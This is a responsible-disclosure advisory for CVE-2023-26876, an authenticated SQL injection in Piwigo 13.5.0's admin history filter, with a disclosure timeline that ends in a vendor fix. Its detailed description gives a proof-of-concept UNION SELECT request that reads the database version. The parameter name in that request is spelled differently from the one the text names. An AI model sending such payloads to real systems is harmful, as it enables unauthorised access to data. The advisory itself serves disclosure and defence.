Piwigo 13.5.0 SQL Injection Vulnerability

Piwigo - Version 13.5.0

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents]==================================================
 * Overview
 * Detailed description
 * Timeline of disclosure
 * Thanks & Acknowledgments
 * References

=====[ Vulnerability
Information]=============================================
 * Class: improper Neutralization of Special Elements used in an SQL Command
('SQL injection') [CWE-89] improper Neutralization of Special Elements used
in an SQL Command ('SQL Injection')
 * CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
 * CVE-2023-26876

=====[ Overview]========================================================
 * System affected : Piwigo - Version 13.5.0
 * Software Version : Version 13.5.0 (other versions may also be affected).
 * Impact : Piwigo 13.5.0 is vulnerable to SQL injection via
/filter_user_id parameter to the
admin.php?page=history&filter_image_id=&filter_user_id endpoint. An
attacker can exploit this by
executing SQL injection code to retrieve sensitive (P1) information and
performing unintended actions.

=====[ Detailed
description]=================================================

An authenticated user could run SQLi commands in the application and
retrieve sensitive information (P1) and database information. Using the
endpoint
http://localhost/admin.php?page=history&filter_image_id=&filter_user_id. To
explore just execute the following request:

GET
/piwigo/admin.php?page=history&filter_image_id=v3cna&filder_user_id=1%20UNION%20ALL%20SELECT
%20CONCAT(0x4141414141,IFNULL(CAST(VERSION()%20AS%20NCHAR),0x20),0x4141414141)--%20--
HTTP/1.1
Host: localhost
Cookie: pwg_id=cookies

Check the value contained in the *filter_image_id* variable at the request
response.


=====[ Timeline of
disclosure]===============================================

12/Fev/2023 - Responsible disclosure was initiated with the vendor.

17/Fev/2023 - Piwigo confirmed the issue;

08/Mar/2023 - CVE-2023-26876 was assigned and reserved.

09/Mar/2023 - The vendor fixed the vulnerability SQL Injection.

=====[ Thanks & Acknowledgments]========================================

 * fxo,ravs
 * Henrique Arcoverde < henrique.arcoverde () tempest.com.br >
 * Tempest Security Intelligence / Tempest's Pentest Team [3]

=====[ References ]=====================================================

[1][https://cwe.mitre.org/data/definitions/89.html]

[2][https://github.com/Piwigo/Piwigo/issues/1876]

[3][https://www.tempest.com.br|http://www.tempest.com.br/]

[4][https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26876]

=====[ EOF ]===========================================================